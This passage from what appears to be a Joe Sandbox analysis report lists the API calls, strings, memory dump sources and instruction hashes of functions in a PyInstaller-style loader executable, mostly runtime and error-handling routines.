                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6DD6579A1,00000000,?,00000000,00000000,?,00007FF6DD65154F), ref: 00007FF6DD65747F
                                                              • Part of subcall function 00007FF6DD652B30: MessageBoxW.USER32 ref: 00007FF6DD652C05
                                                            Strings
                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6DD6574DA
                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6DD657456
                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6DD657493
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                            • API String ID: 1662231829-3498232454
                                                            • Opcode ID: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
                                                            • Instruction ID: df9526ff5d86627c1cc75853bb6001333234ad7c2abde69577682d9a096822a3
                                                            • Opcode Fuzzy Hash: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
                                                            • Instruction Fuzzy Hash: FB319351F1C7C251FA20BB25E9153BE5291AF987C0F844433DA4EC2BD7FE2CE164AA80
                                                            Function 00007FF6DD658AE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658BA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                            • API String ID: 3723044601-876015163
                                                            • Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                            • Instruction ID: 76ca8d9bc48d036809a4d51422a9b072a82f1d41c01b38bc449b37d5126a9753
                                                            • Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                            • Instruction Fuzzy Hash: 0C217322F08A8691EB50EB29F80007DA361FB887C4F584532DB4CD3B69FF2CE5659B40
                                                            Function 00007FF6DD66B710 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
                                                            • Instruction ID: 52b4f0e7ddeeafbcd03969b0b6021c28b085981694e159a96d5ba3de1b1d1e8e
                                                            • Opcode Fuzzy Hash: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
                                                            • Instruction Fuzzy Hash: B9217924E0C2C282FA687739965513D62429F447B0F100776E93EC6AD6FF2CF82167C0
                                                            Function 00007FF6DD6785BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                            • String ID: CONOUT$
                                                            • API String ID: 3230265001-3130406586
                                                            • Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                            • Instruction ID: f97181e9dfd1b96ca0ff7aca2efad8ed70772e4c47d9b46b06d652835c126342
                                                            • Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                            • Instruction Fuzzy Hash: F211B921F18B85A6E7509B46E85432D77A0FB49FE4F040235D91DC7BA4EF7CE8648780
                                                            Function 00007FF6DD66B888 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B897
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B8CD
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B8FA
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B90B
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B91C
                                                            • SetLastError.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B937
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
                                                            • Instruction ID: 27bada018bf185dba4903050a76c592a02053f9f9b26918910349e54f118c177
                                                            • Opcode Fuzzy Hash: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
                                                            • Instruction Fuzzy Hash: 9B116D20E0C6C282FA187735969513D22519F557B0F040776E97EC76DAFF2CF82166C0
                                                            Function 00007FF6DD65D778 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                            • String ID: csm$f
                                                            • API String ID: 2395640692-629598281
                                                            • Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                            • Instruction ID: dca74375438f1892c035117c15e30c8f53f327e7987afd1a2e59a41ef3afb0d6
                                                            • Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                            • Instruction Fuzzy Hash: 9C51D632E196C286D714EB11E404B3D3755FB51B98F548132D95E877CAFF38E8909B80
                                                            Function 00007FF6DD652600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                            • String ID: Unhandled exception in script
                                                            • API String ID: 3081866767-2699770090
                                                            • Opcode ID: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
                                                            • Instruction ID: 66e5fc7a587206b3cf01664c22f10c4c613ea15220b98998c92699cf8afc27c1
                                                            • Opcode Fuzzy Hash: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
                                                            • Instruction Fuzzy Hash: 73315E32E19AC285EB20EF65E8552FD6360FF88784F400136EA4D8BA5AEF3CD155D740
                                                            Function 00007FF6DD6529E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD658560: GetLastError.KERNEL32(00000000,00007FF6DD652A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD658587
                                                              • Part of subcall function 00007FF6DD658560: FormatMessageW.KERNEL32 ref: 00007FF6DD6585B6
                                                              • Part of subcall function 00007FF6DD658AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
                                                            • MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            • MessageBoxA.USER32 ref: 00007FF6DD652B0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 2806210788-2410924014
                                                            • Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                            • Instruction ID: 92439d3e73d684efc95fcd7b1497501b5cabead251c5725f2e7891a93cbee88b
                                                            • Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                            • Instruction Fuzzy Hash: AE316672E286C691E630EB14E4516EE6364FF847C4F404137E68D83A9AEF3CD655DB80
                                                            Function 00007FF6DD66A018 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                            • Instruction ID: 517589951054be3f896ab370acd9539172383621737f8fb3ebc4eb43eb5d2d27
                                                            • Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                            • Instruction Fuzzy Hash: EEF0AF61F08A86A1EB20AB28E44837D5360AF49764F440236D56E865E4EF2CE498E3D0
                                                            Function 00007FF6DD679C40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                            • Instruction ID: 55406fe00dedfabdf098ec37c2acf701e87f3818260c00bd1b4aea5b07cd012f
                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                            • Instruction Fuzzy Hash: 50118F32E18A9B31FA643528E84237D15C0AF55370E041737E96EC6BDEFF2CA8606280
                                                            Function 00007FF6DD66B950 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B96F
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B98E
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B9B6
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B9C7
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B9D8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
                                                            • Instruction ID: df041bbc83a86eed041fab4d176f34f451ca14cc82869544e772e41c70d05423
                                                            • Opcode Fuzzy Hash: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
                                                            • Instruction Fuzzy Hash: 51116D20E0C2C281FA58B73A955113D6151AFA63B0F044376E97DC67DAFE2CF862A6C1
                                                            Function 00007FF6DD66B7E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
                                                            • Instruction ID: b39a8361ce57930db4afc5500adb76590d4e84dc87a6fe1ae3ef7beb7a9c8fd6
                                                            • Opcode Fuzzy Hash: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
                                                            • Instruction Fuzzy Hash: 8D11F720E0D28782F96C7679585117E22819F55370F1847BBE93ECA2D3FE2DB821B6D1
                                                            Function 00007FF6DD6664B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: verbose
                                                            • API String ID: 3215553584-579935070
                                                            • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                            • Instruction ID: f36aa5011282e6aa177a7752d6b4b12e9a1fc4ae74b3dfe68950dcdc7f4da210
                                                            • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                            • Instruction Fuzzy Hash: 9791DE32E086C681E720AAA5F45137D36A5AB40B94F4441F7DB5EC63D5FE3CE825A3C1
                                                            Function 00007FF6DD6705A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                            • Instruction ID: 481957ff4f1a6d9063c10adb7181332216ee72d4eb07f0181cb3383600dd56d6
                                                            • Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                            • Instruction Fuzzy Hash: C381E771E882CAB5FB646F25821027C36B0EB11B84F554037DA09C7A95FF2CE421BBE1
                                                            Function 00007FF6DD65EFD8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                            • Instruction ID: b256a92644c57a6a2bd09413cc87ab8942c5646d0eb876b9827834fdcb6d410b
                                                            • Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                            • Instruction Fuzzy Hash: D5614C32E08A8586E720EF65D4403BD77A0F744B98F144226EF4D57B96EF38E1A5D740
                                                            Function 00007FF6DD65F334 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
